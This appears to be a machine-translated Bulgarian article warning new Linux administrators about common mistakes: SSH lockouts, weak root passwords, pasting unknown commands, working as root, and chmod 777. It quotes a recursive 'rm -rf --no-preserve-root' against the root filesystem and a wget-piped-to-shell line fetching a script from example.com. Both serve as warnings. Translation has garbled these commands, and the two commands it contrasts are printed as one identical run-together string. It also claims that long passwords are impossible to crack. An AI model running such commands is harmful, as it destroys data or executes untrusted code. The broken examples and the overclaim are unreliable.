Phenquestions
Командният ред на Linux дава на администраторите на сървъра контрол върху техните сървъри и данните, съхранявани на тях, но малко ги спира да изпълняват разрушителни команди с последствия, които не могат да бъдат отменени. Случайното изтриване на данни е само един вид грешка, която новите администратори на сървъра допускат.
Заключване на ключовете вътре
Администраторите на сървъри се свързват със сървъри с SSH, услуга, която обикновено се изпълнява на порт 22, осигуряваща черупка за вход, чрез която удостоверените потребители могат да изпълняват команди на отдалечени сървъри. Стандартна стъпка за втвърдяване на сигурността е да конфигурирате SSH да приема връзки на различен порт. Преместването на SSH към високо номериран произволен порт ограничава въздействието на атаки с груба сила; хакерите не могат да правят опити за злонамерени влизания, когато не могат да намерят порта, на който SSH слуша.
Въпреки това администратор, който конфигурира SSH да слуша на различен порт и след това рестартира SSH сървъра, може да открие, че не само хакерите са блокирани. Ако защитната стена на сървъра също не е преконфигурирана, за да позволи връзки на новия порт, опитите за свързване никога няма да достигнат до SSH сървъра. Администраторът ще бъде блокиран от сървъра си, без да има начин да реши проблема, освен да отвори билет за поддръжка при техния доставчик на хостинг услуги. Ако промените SSH порта, не забравяйте да отворите новия порт в конфигурацията на защитната стена на вашия сървър.
Избор на лесно позната парола
Атаките с груба сила са игра за отгатване. Нападателят пробва много потребителски имена и пароли, докато не удари комбинация, която ги пуска. Речниковата атака е по-усъвършенстван подход, който използва списъци с пароли, често извлечени от изтекли бази данни с пароли. Атаките срещу основния акаунт са по-лесни, отколкото срещу други акаунти, защото нападателят вече знае потребителското име. Ако корен акаунт има проста парола, той може да бъде хакнат за нула време.
Има три начина за защита срещу груба сила и речникови атаки срещу основния акаунт.
- Изберете дълга и сложна парола. Простите пароли са лесни за разбиване; дългите и сложни пароли са невъзможни.
- Конфигурирайте SSH, за да забраните влизанията на root. Това е проста промяна на конфигурацията, но се уверете, че „sudo“ е конфигуриран, за да позволи на акаунта ви да повиши своите привилегии.
- Използвайте удостоверяване въз основа на ключ вместо пароли. Базираните на сертификати входни данни премахват изцяло риска от груби атаки.
Копиране на команди, които не разбирате
Stack Exchange, Server Fault и подобни сайтове са спасителен пояс за новите системни администратори на Linux, но трябва да избягвате изкушението да копирате и поставите команда на черупката, която не разбирате. Каква е разликата между тези две команди?
sudo rm -rf --no -serve-root / mnt / mydrive /sudo rm -rf --no -serve-root / mnt / mydrive /
Лесно е да се види, когато се показват заедно, но не е толкова лесно, когато търсите във форуми и търсите команда за изтриване на съдържанието на монтиран том. Първата команда изтрива всички файлове на монтираното устройство. Втората команда изтрива тези файлове и всичко в кореновата файлова система на сървъра. Единствената разлика е пространството преди последната наклонена черта.
Администраторите на сървъри могат да срещнат дълги команди с конвейери, за които се казва, че правят едно нещо, но правят съвсем друго. Бъдете особено внимателни с командите, които изтеглят код от интернет.
wget http: // пример.com / verybadscript -O - | ш -Тази команда използва wget за изтегляне на скрипт, който се връща към черупката и се изпълнява. За да стартирате това безопасно, трябва да разберете какво прави командата, както и какво прави изтегленият скрипт, включително всеки код, който изтегленият скрипт може сам да изтегли.
Влизане като root
Докато обикновените потребители могат да променят само файлове в домашната си папка, малко е това, което основният потребител не може да направи на Linux сървър. Той може да изпълнява всеки софтуер, да чете всякакви данни и да изтрива всеки файл.
Приложенията, изпълнявани от root потребителя, имат подобна мощност. Удобно е да сте влезли като root потребител, защото не е необходимо непрекъснато да „sudo“ или „su“, но е опасно. Печатната грешка може да унищожи сървъра ви за секунди. Софтуерът за грешки, управляван от основния потребител, може да създаде катастрофа. За ежедневни операции влезте като обикновен потребител и издигнете до root права само когато е необходимо.
Не се изучават разрешенията за файлова система
Разрешенията на файловата система могат да объркат и разочароват новите потребители на Linux. Низ за разрешение като „drwxr-xr-x“ в началото изглежда безсмислен и разрешенията могат да ви попречат да модифицирате файлове и да спрете софтуера да прави това, което искате.
Системните администратори бързо научават, че chmod 777 е магическо заклинание, което решава повечето от тези проблеми, но това е ужасна идея. Позволява на всеки с акаунт да чете, пише и изпълнява файла. Ако изпълните тази команда в директорията на уеб сървъра, вие искате да бъдете хакнати. Разрешенията за Linux файлове изглеждат сложни, но ако отделите няколко минути, за да научите как работят, ще откриете логична и гъвкава система за контрол на достъпа до файлове.
В епоха, която оценява простия потребителски опит над всички други фактори, командният ред на Linux остава решително сложен и устойчив на опростяване. Не можете да се бъркате и да се надявате, че всичко ще се оправи. Няма да се оправи и в крайна сметка ще стигнете до бедствие.
Но ако научите основите - разрешения за файлове, инструменти за командния ред и техните опции, най-добри практики за сигурност - можете да станете майстор на една от най-мощните компютърни платформи, създавани някога.
